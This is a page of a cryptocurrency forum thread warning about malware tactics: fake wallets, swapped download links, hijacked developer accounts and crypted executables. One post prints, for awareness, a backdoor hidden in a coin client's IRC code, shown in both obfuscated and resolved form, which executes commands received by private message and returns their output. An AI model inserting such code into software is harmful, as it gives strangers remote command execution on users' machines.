Pages:
Author

Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 2. (Read 858634 times)

member
Activity: 812
Merit: 13
Crypto bookmaker and casino
yes you are right Most of the airdrops are not legit and are just a simple strategy employed by hackers to take advantage of the information of airdrop hunters
it best to verify the authenticity of an airdrop from the official telegram of the project before participating.
Thousands of air drop that are being developed by developers are never legit and most time, they are used to steal data and increase the vulnerability of hacking people without them knowing what they have gotten there self into. Scammers can decide to create an air drop allowing innocent people to drop there information to get the airdrop and later using it against them. We should be aware of different tactics used by scammers.
legendary
Activity: 1372
Merit: 1001
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
So much malware now and more and more sophisticated we need to be wary and can you share some coin software or some project to keep people alert and stay away , because I think this is something we should all do and share together.
legendary
Activity: 3752
Merit: 1864
Hello everyone ! Smiley
I read this thread, and the question arose - are you really running mining, wallets and so on on a PC / laptop that is a storage of critical information? Seriously ?
I believe that if you own more or less significant funds, and "work" in this market, then you MUST provide yourself with the conditions of "information hygiene". Ideally - different devices for working with wallets / exchanges, separately for forums, etc., separately for mail / telegram / vibe, etc., and separately for mining, monitoring.
Antiviruses and other means of protection ALWAYS have relevance with a lag in relation to malicious solutions. First, a disease appears, then a medicine for it, but nothing else!
copper member
Activity: 224
Merit: 2
TheStandard
Nowadays, malware infection attempts are very sophisticated, even when you exchange swaps from pankeswap from anonymous coins like VERA.. this is a coin where you just need to perform swap operations. to another coin immediately you will lose all your balance in the wallet. This is a new sophisticated trick that should be warned, you should be careful of strange coins being transferred to your wallet.
legendary
Activity: 1778
Merit: 1474
🔃EN>>AR Translator🔃
when the announcement board will be without the possibility of making self moderate announcements? this helps too much the scammers

This was suggested several times but seems not to be a priority in admin to-do list. Note that the altcoin board is considered a spam area and administration seems not to take things seriously here. Without to forget that a user is the first/only responsible about what he may accept to install into his device and those sticky threads in top boards are a rising flags warning us not to trust anybody and to do enough searches with links and softwares.

My device was increasingly misbehaving last week. I feared a malware has entered the device.

Sometimes there is no way to know if the device is really infected or not. One and only solution is to move important files in an exterior hard drive before formatting the device. Always take care if your device is all the time connected to internet.
member
Activity: 430
Merit: 22
Professional user
when the announcement board will be without the possibility of making self moderate announcements? this helps too much the scammers
newbie
Activity: 107
Merit: 0
There are other ways accounts get hacked, there are some fake projects online that would request for logins just to get intouch with how someone's password look like, hackers tried this passwords on other accounts of the victims like their gmail  and blockchain accounts.  This point also makes account vulnerable to attacks.
newbie
Activity: 1050
Merit: 0
It would have been better if you listed atleqst few of those platforms resulting from the cause of such malwares and attacks.
full member
Activity: 574
Merit: 101
Just had my poloniex account hacked with 2FA enabled. I still don't understand
how it is possible. If anyone is interested can u track for me where the coins ended
up I get lost along the way

0x96C3262B0a3F5f1348D91C11637f217bf72F8773
0x0db528e73d07e0fae92b1b705e01a1d5627b1cddae8fc2064ffc57bda3b236ef

0x96C3262B0a3F5f1348D91C11637f217bf72F8773
0xd6ea42c2fbd03170b6047b6b6c40211bb1efef0b307677a3b97891e3b302e8d1


Yes, I think that the malwares are scary because just like you and the other members said your account might get hacked and  that is unfortunate because your a oount might get attacjed by the hackers and they can access your information through that hacking.
member
Activity: 180
Merit: 28
There have been many attacks lately through fake private messages on discord servers.
Stay safe, think twice before you download  and check three times before you open a new file.

https://bitcointalksearch.org/topic/m.54016299
https://bitcointalksearch.org/topic/m.54060121
https://bitcointalksearch.org/topic/m.54010280
jr. member
Activity: 168
Merit: 2
mada mada dane
Recently I heard of a new malware that operates via public or shared charging ports. I mean, you can get your bank account cleaned out in seconds by merely connecting your phone to a charging port in a public place. How frightening this whole thing is! Wow.

That's pretty scary. I haven't heard same thing here in my country but who knows there might be someone who already experienced this one but wasn't able to report to authorities so there is no news. The most hacking I know was about people who were robbed by their banks, blaming a glitch in their system.
member
Activity: 242
Merit: 10
Hi Crypto Friends :)
it professed to be my specialist organization and gave me a number to call. I admit I tried to call however the ring didn't sound right. Seemed like an old phone. I hung up and rebooted my PC.

If you get that while browsing, you should be able to block it with a noscript extention for firefox / your browser. I think rather than a crypto scam, most of the time it's just tech support scammers and if you see a message with something like "Hello! your computer have contacted Microsoft support and alerted us that your PC has a virus. Please call -number here-" then you can pretty much safely ignore it. When dealing with crypto though, it's always a good idea to have a cold / hardware wallet since it's much safer.
sr. member
Activity: 574
Merit: 250
It is not always as easy as you want it to believe, today they use many methods to steal cryptocurrencies and not all people are capable of avoiding them. Stealing the crypto is very profitable and you don't have much chance to report the theft to the police.
jr. member
Activity: 310
Merit: 1
Recently I heard of a new malware that operates via public or shared charging ports. I mean, you can get your bank account cleaned out in seconds by merely connecting your phone to a charging port in a public place. How frightening this whole thing is! Wow.
legendary
Activity: 3178
Merit: 3295
If anybody find something with Malware or bad software , just report it and you can look in this threads too!

Guide and advice for new Users before you Download anything from the Forum !
Report Malware and Suspicious Links here so Mods can take Action !
jr. member
Activity: 178
Merit: 1
Use of Mobile for Crypto trade and investment is not safe.As there are lots of Applications specially those are not authorized by android are installed on our phone which not only breach our private data but also keep an eye on our financial assets.The more dangerous thing is that they are harder to detect in mobile phone as there are many apps installed on our phone.
Recently, My friend lots  ETHEREUM from his wallet and the reason was the applications that work in background.....
Therefore,We should be more vigilant if we do have crypto or other online financial assets in our phone
newbie
Activity: 8
Merit: 0
Actually, I am very confused now. As you say, the pollution is getting more and more sophisticated, it's hard to avoid it.
I do not know what to do to invest alt safe   Cry  Cry  Cry
jr. member
Activity: 35
Merit: 1
I always use antivirus and anti malware as sometimes antivirus doesn't catch the malware or backdoor programs.
jr. member
Activity: 109
Merit: 1
These con artists are continually getting the hang of, getting to be more astute and increasingly refined. Be cautious consistently. Download just from authority locales and consistently check where the connection drives you will go.
hero member
Activity: 2968
Merit: 687
It is neverending fight, so we must watch out for any new threats, malware and viruses,
and more so if we have our wallets installed on computers
It is indeed a never ending fight.If there are ways that had already been disclosed and being avoided or completely knowns,these scammers does continue to create new ways to scam or hack people with all possibilities that's why our own experience and common sense is the main weapon to avoid these things.

never install or download any app from unknown sources
No. 1 basic rule but people do still fail to follow this one.
Pages:
Jump to: